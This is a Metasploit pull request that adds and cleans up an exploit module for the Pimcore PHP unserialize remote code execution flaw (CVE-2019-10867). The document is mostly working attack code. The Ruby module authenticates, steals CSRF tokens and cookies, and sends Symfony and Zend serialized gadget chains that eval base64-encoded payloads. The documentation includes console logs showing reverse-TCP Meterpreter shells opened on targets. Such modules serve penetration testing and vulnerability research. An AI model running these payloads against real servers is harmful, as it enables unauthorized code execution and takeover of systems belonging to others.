### PR TITLE
Add Pimcore from 4.0.0 to 5.6.6 Unserialize RCE (CVE-2019-10867)

### DIFF
--- a/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md
+++ b/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md
@@ -1,29 +1,30 @@
 ## Description
 
-This module exploits a PHP unserialize() in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability.
+This module exploits a PHP (unserialize()) in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability.
 
 The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method make it possible to exploit the unserialize function when passing untrusted values in "data" parameter.
 
-Tested on Pimcore 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4, 5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0 with the Symfony unserialize payload
+Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.6.6 with the Symfony unserialize payload.
 
-Tested on Pimcore 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3, 4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0, 4.0.1, 4.0.0 with the Zend unserialize payload
+Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.
 
 ## Vulnerable Application
 
-Affecting Pimcore, version 5.x <= 5.6.6 and 4.x
+Affecting Pimcore, version 5.x <= 5.6.6 and 4.x.
 
 ## Verification Steps
 
-1. Setting up a working installation of Pimcore 4.x or 5.x
-2. Start `msfconsole`
-3. `use exploit/multi/http/pimcore_unserialize_rce`
-4. `set RHOST <IP>`
-5. `set USERNAME <USERNAME>`
-6. `set PASSWORD <PASSWORD>`
-7. `check`
-8. You should see `The target service is running, but could not be validated.`
-9. `exploit`
-10. You should get a meterpreter session!
+Set up a default installation of Pimcore 4.x or 5.x (e.g.: `composer create-project pimcore/skeleton my-project` for the 5.x branch) as described on [Pimcore Installation documentation](https://pimcore.com/docs/5.x/Development_Documentation/Getting_Started/Installation.html) then:
+
+1. Start `msfconsole`
+2. `use exploit/multi/http/pimcore_unserialize_rce`
+3. `set RHOST <IP>`
+4. `set USERNAME <USERNAME>`
+5. `set PASSWORD <PASSWORD>`
+6. `check`
+7. You should see `The target service is running, but could not be validated.`
+8. `exploit`
+9. You should get a meterpreter session!
 
 ## Options
 

--- a/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md
+++ b/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md
@@ -1,0 +1,109 @@
+## Description
+
+This module exploits a PHP unserialize() in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability.
+
+The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method make it possible to exploit the unserialize function when passing untrusted values in "data" parameter.
+
+Tested on Pimcore 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4, 5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0 with the Symfony unserialize payload
+
+Tested on Pimcore 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3, 4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0, 4.0.1, 4.0.0 with the Zend unserialize payload
+
+## Vulnerable Application
+
+Affecting Pimcore, version 5.x <= 5.6.6 and 4.x
+
+## Verification Steps
+
+1. Setting up a working installation of Pimcore 4.x or 5.x
+2. Start `msfconsole`
+3. `use exploit/multi/http/pimcore_unserialize_rce`
+4. `set RHOST <IP>`
+5. `set USERNAME <USERNAME>`
+6. `set PASSWORD <PASSWORD>`
+7. `check`
+8. You should see `The target service is running, but could not be validated.`
+9. `exploit`
+10. You should get a meterpreter session!
+
+## Options
+
+* **TARGETURI**: Path to Pimcore installation (“/” is the default)
+* **USERNAME**: Username to authenticate with
+* **PASSWORD**: Password to authenticate with
+
+## Scenario
+
+### Tested on Pimcore 5.6.6
+
+```
+msf5 > use exploit/multi/http/pimcore_unserialize_rce 
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com
+rhost => target.com
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8566
+rport => 8566
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin
+username => admin
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set password pimcore
+password => pimcore
+msf5 exploit(multi/http/pimcore_unserialize_rce) > check
+[*] 192.168.2.59:8566 - The target service is running, but could not be validated.
+msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit
+
+[*] Started reverse TCP handler on 10.0.8.2:4444 
+[+] Authentication successful: admin:pimcore
+[*] Pimcore version: 5.6.6
+[*] Pimcore build: 9722d19576f9e49969d4a3708e045fa481eaad02
+[+] The target is vulnerable!
+[+] JSON paylod uploaded successful: /var/www/html/var/tmp/bulk-import.tmp
+[*] Selected payload: Pimcore 5.x (Symfony unserialize payload)
+[*] Sending stage (38247 bytes) to 192.168.2.59
+[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:34128) at 2019-04-07 12:04:08 +0200
+[!] This exploit may require manual cleanup of '/var/www/html/var/tmp/bulk-import.tmp' on the target
+
+meterpreter > 
+[+] Deleted /var/www/html/var/tmp/bulk-import.tmp
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/pimcore_unserialize_rce) > 
+```
+
+### Tested on Pimcore 4.6.5
+
+```
+msf5 > use exploit/multi/http/pimcore_unserialize_rce 
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com
+rhost => target.com
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8465
+rport => 8465
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin
+username => admin
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set password P1mc0r3_4dm1n
+password => P1mc0r3_4dm1n
+msf5 exploit(multi/http/pimcore_unserialize_rce) > check
+[*] 192.168.2.59:8465 - The target service is running, but could not be validated.
+msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit
+
+[*] Started reverse TCP handler on 10.0.8.2:4444 
+[+] Authentication successful: admin:P1mc0r3_4dm1n
+[*] Pimcore version: 4.6.5
+[*] Pimcore build: 4123
+[+] The target is vulnerable!
+[+] JSON paylod uploaded successful: /var/www/html/website/var/system/bulk-import.tmp
+[*] Selected payload: Pimcore 4.x (Zend unserialize payload)
+[*] Sending stage (38247 bytes) to 192.168.2.59
+[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:57882) at 2019-04-07 12:00:20 +0200
+[+] Deleted /var/www/html/website/var/system/bulk-import.tmp
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/pimcore_unserialize_rce) > 
+```

--- a/modules/exploits/multi/http/pimcore_unserialize_rce.rb
+++ b/modules/exploits/multi/http/pimcore_unserialize_rce.rb
@@ -21,13 +21,10 @@ class MetasploitModule < Msf::Exploit::Remote
         "bulk-commit" method make it possible to exploit the unserialize function
         when passing untrusted values in "data" parameter.
 
-        Tested on Pimcore 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4,
-        5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0 with the Symfony
-        unserialize payload
+        Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.5.4, 5.6.0-5.6.6 with the Symfony
+        unserialize payload.
 
-        Tested on Pimcore 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3,
-        4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0,
-        4.0.1, 4.0.0 with the Zend unserialize payload
+        Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.
       ),
       'License' => MSF_LICENSE,
       'Author' =>
@@ -84,59 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
 
       # Grabbing CSRF token and PHPSESSID cookie
-      uri = target_uri.path + 'admin/?_dc=' + res.headers['Location'].scan(/\/admin\/\?_dc=([0-9]+)/).flatten.first.to_s
-
-      res = send_request_cgi(
-        'method' => 'GET',
-        'uri' => normalize_uri(uri),
-        'cookie' => res.get_cookies
-      )
-
-      if res && res.code == 200
-        # Pimcore 5.x
-        # Tested on 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4, 5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0
-        unless res.body.scan(/"csrfToken": "[a-z0-9]+",/).empty?
-          datastore['csrfToken'] = res.body.scan(/"csrfToken": "([a-z0-9]+)",/).flatten.first.to_s
-          datastore['cookies'] = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+;)/).flatten[0] + ' pimcore_admin_sid=1;'
-
-          # Version
-          version = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[0]
-          build = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[1]
-          print_status("Pimcore version: #{version}")
-          print_status("Pimcore build: #{build}")
-          if Gem::Version.new(version) >= Gem::Version.new('5.0.0') && Gem::Version.new(version) <= Gem::Version.new('5.6.6')
-            print_good("The target is vulnerable!")
-            return targets[0]
-          else
-            return nil
-          end
-        end
-
-        # Pimcore 4.x
-        # Tested on 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3, 4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0, 4.0.1, 4.0.0
-        unless res.body.scan(/csrfToken: "[a-z0-9]+",/).empty?
-          datastore['csrfToken'] = res.body.scan(/csrfToken: "([a-z0-9]+)",/).flatten.first.to_s
-          datastore['cookies'] = res.get_cookies.scan(/(pimcore_admin_sid=[a-z0-9]+;)/).flatten[0]
-
-          # Version
-          version = res.body.scan(/version: "([0-9]{1}\.[0-9]{1}\.[0-9]{1})",/i).flatten[0]
-          build = res.body.scan(/build: "([0-9]+)",/i).flatten[0]
-          print_status("Pimcore version: #{version}")
-          print_status("Pimcore build: #{build}")
-          if Gem::Version.new(version) >= Gem::Version.new('4.0.0') && Gem::Version.new(version) <= Gem::Version.new('4.6.5')
-            print_good("The target is vulnerable!")
-            return targets[1]
-          else
-            return nil
-          end
-        end
-
-        return nil
-
-      else
-        # non è un corretto dire qua auth unsuccessful
-        fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
-      end
+      return grab_csrftoken(res)
     end
 
     if res.code == 302 && res.headers['Location'] =~ /auth_failed=true/
@@ -144,6 +89,65 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+  end
+
+  def grab_csrftoken(auth_res)
+    uri = "#{target_uri.path}admin/?_dc=#{auth_res.headers['Location'].scan(/\/admin\/\?_dc=([0-9]+)/).flatten.first}"
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(uri),
+      'cookie' => auth_res.get_cookies
+    )
+
+    if res && res.code == 200
+      # Pimcore 5.x
+      unless res.body.scan(/"csrfToken": "[a-z0-9]+",/).empty?
+        datastore['csrfToken'] = res.body.scan(/"csrfToken": "([a-z0-9]+)",/).flatten.first.to_s
+        datastore['cookies'] = "#{res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+;)/).flatten[0]} pimcore_admin_sid=1;"
+
+        # Version
+        version = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[0]
+        build = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[1]
+        print_version(version, build)
+        return assign_target(version)
+      end
+
+      # Pimcore 4.x
+      unless res.body.scan(/csrfToken: "[a-z0-9]+",/).empty?
+        datastore['csrfToken'] = res.body.scan(/csrfToken: "([a-z0-9]+)",/).flatten.first.to_s
+        datastore['cookies'] = res.get_cookies.scan(/(pimcore_admin_sid=[a-z0-9]+;)/).flatten[0]
+
+        # Version
+        version = res.body.scan(/version: "([0-9]{1}\.[0-9]{1}\.[0-9]{1})",/i).flatten[0]
+        build = res.body.scan(/build: "([0-9]+)",/i).flatten[0]
+        print_version(version, build)
+        return assign_target(version)
+      end
+
+      # Version different from 4.x or 5.x
+      return nil
+    else
+      fail_with(Failure::NoAccess, 'Failed to grab csrfToken and PHPSESSID')
+    end
+  end
+
+  def print_version(version, build)
+    print_status("Pimcore version: #{version}")
+    print_status("Pimcore build: #{build}")
+  end
+
+  def assign_target(version)
+    if Gem::Version.new(version) >= Gem::Version.new('5.0.0') && Gem::Version.new(version) <= Gem::Version.new('5.6.6')
+      print_good("The target is vulnerable!")
+      return targets[0]
+    elsif Gem::Version.new(version) >= Gem::Version.new('4.0.0') && Gem::Version.new(version) <= Gem::Version.new('4.6.5')
+      print_good("The target is vulnerable!")
+      return targets[1]
+    else
+      print_error("The target is NOT vulnerable!")
+      return nil
+    end
   end
 
   def upload
@@ -186,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     unless res
-      fail_with(Failure::Unreachable, 'Connection failed')
+      return Exploit::CheckCode::Unknown
     end
 
     if res.code == 200 && res.headers =~ /pimcore/i || res.body =~ /pimcore/i

--- a/modules/exploits/multi/http/pimcore_unserialize_rce.rb
+++ b/modules/exploits/multi/http/pimcore_unserialize_rce.rb
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def upload
     # JSON file payload
-    fpayload = "{\"customlayout\":[{\"creationDate\": \"1\", \"modificationDate\": \"2\", \"userOwner\": \"3\", \"userModification\": \"4\"}]}"
+    fpayload = "{\"customlayout\":[{\"creationDate\": \"#{rand(1..9)}\", \"modificationDate\": \"#{rand(1..9)}\", \"userOwner\": \"#{rand(1..9)}\", \"userModification\": \"#{rand(1..9)}\"}]}"
     # construct POST data
     data = Rex::MIME::Message.new
     data.add_part(fpayload, 'application/json', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")

--- a/modules/exploits/multi/http/pimcore_unserialize_rce.rb
+++ b/modules/exploits/multi/http/pimcore_unserialize_rce.rb
@@ -1,0 +1,264 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "Pimcore 4.x and 5.x Unserialize RCE",
+      'Description' => %q(
+        This module exploits a PHP unserialize() in Pimcore before 5.7.1 to
+        execute arbitrary code. An authenticated user with "classes" permission
+        could exploit the vulnerability.
+
+        The vulnerability exists in the "ClassController.php" class, where the
+        "bulk-commit" method make it possible to exploit the unserialize function
+        when passing untrusted values in "data" parameter.
+
+        Tested on Pimcore 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4,
+        5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0 with the Symfony
+        unserialize payload
+
+        Tested on Pimcore 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3,
+        4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0,
+        4.0.1, 4.0.0 with the Zend unserialize payload
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Daniele Scanu', # Discovery & PoC
+          'Fabio Cogno' # Metasploit module
+        ],
+      'References' =>
+        [
+          ['CVE', '2019-10867'],
+          ['URL', 'https://github.com/pimcore/pimcore/commit/38a29e2f4f5f060a73974626952501cee05fda73'],
+          ['URL', 'https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-173998']
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' =>
+        [
+          ['Pimcore 5.x (Symfony unserialize payload)', 'type' => :symfony],
+          ['Pimcore 4.x (Zend unserialize payload)', 'type' => :zend]
+        ],
+      'Payload' => {
+        'Space' => 8000,
+        'DisableNops' => true
+      },
+      'Privileged' => false,
+      'DisclosureDate' => "Mar 11 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base Pimcore directory path", '/']),
+        OptString.new('USERNAME', [true, "Username to authenticate with", '']),
+        OptString.new('PASSWORD', [false, "Password to authenticate with", ''])
+      ]
+    )
+  end
+
+  def login
+    # Try to login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login', 'login'),
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res.code == 302 && res.headers['Location'] =~ /\/admin\/\?_dc=/
+      print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+
+      # Grabbing CSRF token and PHPSESSID cookie
+      uri = target_uri.path + 'admin/?_dc=' + res.headers['Location'].scan(/\/admin\/\?_dc=([0-9]+)/).flatten.first.to_s
+
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(uri),
+        'cookie' => res.get_cookies
+      )
+
+      if res && res.code == 200
+        # Pimcore 5.x
+        # Tested on 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4, 5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0
+        unless res.body.scan(/"csrfToken": "[a-z0-9]+",/).empty?
+          datastore['csrfToken'] = res.body.scan(/"csrfToken": "([a-z0-9]+)",/).flatten.first.to_s
+          datastore['cookies'] = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+;)/).flatten[0] + ' pimcore_admin_sid=1;'
+
+          # Version
+          version = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[0]
+          build = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[1]
+          print_status("Pimcore version: #{version}")
+          print_status("Pimcore build: #{build}")
+          if Gem::Version.new(version) >= Gem::Version.new('5.0.0') && Gem::Version.new(version) <= Gem::Version.new('5.6.6')
+            print_good("The target is vulnerable!")
+            return targets[0]
+          else
+            return nil
+          end
+        end
+
+        # Pimcore 4.x
+        # Tested on 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3, 4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0, 4.0.1, 4.0.0
+        unless res.body.scan(/csrfToken: "[a-z0-9]+",/).empty?
+          datastore['csrfToken'] = res.body.scan(/csrfToken: "([a-z0-9]+)",/).flatten.first.to_s
+          datastore['cookies'] = res.get_cookies.scan(/(pimcore_admin_sid=[a-z0-9]+;)/).flatten[0]
+
+          # Version
+          version = res.body.scan(/version: "([0-9]{1}\.[0-9]{1}\.[0-9]{1})",/i).flatten[0]
+          build = res.body.scan(/build: "([0-9]+)",/i).flatten[0]
+          print_status("Pimcore version: #{version}")
+          print_status("Pimcore build: #{build}")
+          if Gem::Version.new(version) >= Gem::Version.new('4.0.0') && Gem::Version.new(version) <= Gem::Version.new('4.6.5')
+            print_good("The target is vulnerable!")
+            return targets[1]
+          else
+            return nil
+          end
+        end
+
+        return nil
+
+      else
+        # non è un corretto dire qua auth unsuccessful
+        fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+      end
+    end
+
+    if res.code == 302 && res.headers['Location'] =~ /auth_failed=true/
+      fail_with(Failure::NoAccess, 'Invalid credentials')
+    end
+
+    fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+  end
+
+  def upload
+    # JSON file payload
+    fpayload = "{\"customlayout\":[{\"creationDate\": \"1\", \"modificationDate\": \"2\", \"userOwner\": \"3\", \"userModification\": \"4\"}]}"
+    # construct POST data
+    data = Rex::MIME::Message.new
+    data.add_part(fpayload, 'application/json', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")
+
+    # send JSON file payload to bulk-import function
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'class', 'bulk-import'),
+      'vars_get' => { 'csrfToken' => datastore['csrfToken'] },
+      'cookie' => datastore['cookies'],
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res.code == 200
+      json = res.get_json_document
+      if json['success'] == true
+        print_good("JSON paylod uploaded successful: #{json['filename']}")
+        return json['filename']
+      else
+        print_warning('Cloud not determine JSON payload file upload')
+        return nil
+      end
+    end
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login')
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res.code == 200 && res.headers =~ /pimcore/i || res.body =~ /pimcore/i
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    # Try to log in, grab csrfToken and select target
+    my_target = login
+    if my_target.nil?
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    # Try to upload JSON payload file
+    fname = upload
+
+    unless fname.nil?
+      # Register uploaded JSON payload file for cleanup
+      register_files_for_cleanup(fname)
+    end
+
+    print_status("Selected payload: #{my_target.name}")
+
+    case my_target['type']
+    when :symfony
+      # The payload to execute
+      spayload = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
+
+      # The Symfony object payload
+      serialize = "O:43:\"Symfony\\Component\\Cache\\Adapter\\ApcuAdapter\":3:{"
+      serialize << "s:64:\"\x00Symfony\\Component\\Cache\\Adapter\\AbstractAdapter\x00mergeByLifetime\";"
+      serialize << "s:9:\"proc_open\";"
+      serialize << "s:58:\"\x00Symfony\\Component\\Cache\\Adapter\\AbstractAdapter\x00namespace\";a:0:{}"
+      serialize << "s:57:\"\x00Symfony\\Component\\Cache\\Adapter\\AbstractAdapter\x00deferred\";"
+      serialize << "s:#{spayload.length}:\"#{spayload}\";}"
+    when :zend
+      # The payload to execute
+      spayload = "eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"
+
+      # The Zend1 object payload
+      serialize = "a:2:{i:7;O:8:\"Zend_Log\":1:{s:11:\"\x00*\x00_writers\";a:1:{"
+      serialize << "i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\x00*\00_eventsToMail\";a:1:{"
+      serialize << "i:0;i:1;}s:22:\"\x00*\x00_layoutEventsToMail\";a:0:{}s:8:\"\00*\x00_mail\";"
+      serialize << "O:9:\"Zend_Mail\":0:{}s:10:\"\x00*\x00_layout\";O:11:\"Zend_Layout\":3:{"
+      serialize << "s:13:\"\x00*\x00_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{"
+      serialize << "s:16:\"\x00*\x00_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\x00*\x00_replacement\";"
+      serialize << "S:#{spayload.length}:\"#{spayload}\";}"
+      serialize << "s:20:\"\x00*\x00_inflectorEnabled\";b:1;s:10:\"\x00*\x00_layout\";"
+      serialize << "s:6:\"layout\";}s:22:\"\x00*\x00_subjectPrependText\";N;}}};i:7;i:7;}"
+    end
+
+    # send serialized payload
+    send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri, 'admin', 'class', 'bulk-commit'),
+        'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
+        'cookie' => datastore['cookies'],
+        'vars_post' => {
+          'filename' => fname,
+          'data' => JSON.generate(
+            'type' => 'customlayout',
+            'name' => serialize
+          )
+        },
+        'headers' => {
+          'X-pimcore-csrf-token' => datastore['csrfToken']
+        }
+      }, 30
+    )
+  end
+end

--- a/modules/exploits/multi/http/pimcore_unserialize_rce.rb
+++ b/modules/exploits/multi/http/pimcore_unserialize_rce.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         could exploit the vulnerability.
 
         The vulnerability exists in the "ClassController.php" class, where the
-        "bulk-commit" method make it possible to exploit the unserialize function
+        "bulk-commit" method makes it possible to exploit the unserialize function
         when passing untrusted values in "data" parameter.
 
         Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.5.4, 5.6.0-5.6.6 with the Symfony
@@ -103,24 +103,29 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 200
       # Pimcore 5.x
       unless res.body.scan(/"csrfToken": "[a-z0-9]+",/).empty?
-        datastore['csrfToken'] = res.body.scan(/"csrfToken": "([a-z0-9]+)",/).flatten.first.to_s
-        datastore['cookies'] = "#{res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+;)/).flatten[0]} pimcore_admin_sid=1;"
+        @csrf_token = res.body.scan(/"csrfToken": "([a-z0-9]+)",/).flatten.first.to_s
+        @pimcore_cookies = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+;)/).flatten[0]
+        fail_with(Failure::NotFound, 'Failed to retrieve cookies') unless @pimcore_cookies
+        @pimcore_cookies << " pimcore_admin_sid=1;"
 
         # Version
         version = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[0]
         build = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[1]
+        fail_with(Failure::NotFound, 'Failed to retrieve the version and build') unless version && build
         print_version(version, build)
         return assign_target(version)
       end
 
       # Pimcore 4.x
       unless res.body.scan(/csrfToken: "[a-z0-9]+",/).empty?
-        datastore['csrfToken'] = res.body.scan(/csrfToken: "([a-z0-9]+)",/).flatten.first.to_s
-        datastore['cookies'] = res.get_cookies.scan(/(pimcore_admin_sid=[a-z0-9]+;)/).flatten[0]
+        @csrf_token = res.body.scan(/csrfToken: "([a-z0-9]+)",/).flatten.first.to_s
+        @pimcore_cookies = res.get_cookies.scan(/(pimcore_admin_sid=[a-z0-9]+;)/).flatten[0]
+        fail_with(Failure::NotFound, 'Unable to retrieve cookies') unless @pimcore_cookies
 
         # Version
         version = res.body.scan(/version: "([0-9]{1}\.[0-9]{1}\.[0-9]{1})",/i).flatten[0]
         build = res.body.scan(/build: "([0-9]+)",/i).flatten[0]
+        fail_with(Failure::NotFound, 'Failed to retrieve the version and build') unless version && build
         print_version(version, build)
         return assign_target(version)
       end
@@ -161,8 +166,8 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'admin', 'class', 'bulk-import'),
-      'vars_get' => { 'csrfToken' => datastore['csrfToken'] },
-      'cookie' => datastore['cookies'],
+      'vars_get' => { 'csrfToken' => @csrf_token },
+      'cookie' => @pimcore_cookies,
       'ctype' => "multipart/form-data; boundary=#{data.bound}",
       'data' => data.to_s
     )
@@ -174,10 +179,10 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.code == 200
       json = res.get_json_document
       if json['success'] == true
-        print_good("JSON paylod uploaded successful: #{json['filename']}")
+        print_good("JSON payload uploaded successfully: #{json['filename']}")
         return json['filename']
       else
-        print_warning('Cloud not determine JSON payload file upload')
+        print_warning('Could not determine JSON payload file upload')
         return nil
       end
     end
@@ -251,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'method' => 'POST',
         'uri' => normalize_uri(target_uri, 'admin', 'class', 'bulk-commit'),
         'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
-        'cookie' => datastore['cookies'],
+        'cookie' => @pimcore_cookies,
         'vars_post' => {
           'filename' => fname,
           'data' => JSON.generate(
@@ -260,7 +265,7 @@ class MetasploitModule < Msf::Exploit::Remote
           )
         },
         'headers' => {
-          'X-pimcore-csrf-token' => datastore['csrfToken']
+          'X-pimcore-csrf-token' => @csrf_token
         }
       }, 30
     )


### PR DESCRIPTION
This module exploits a PHP unserialize() in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability.

The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method make it possible to exploit the unserialize function when passing untrusted values in "data" parameter.

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10867
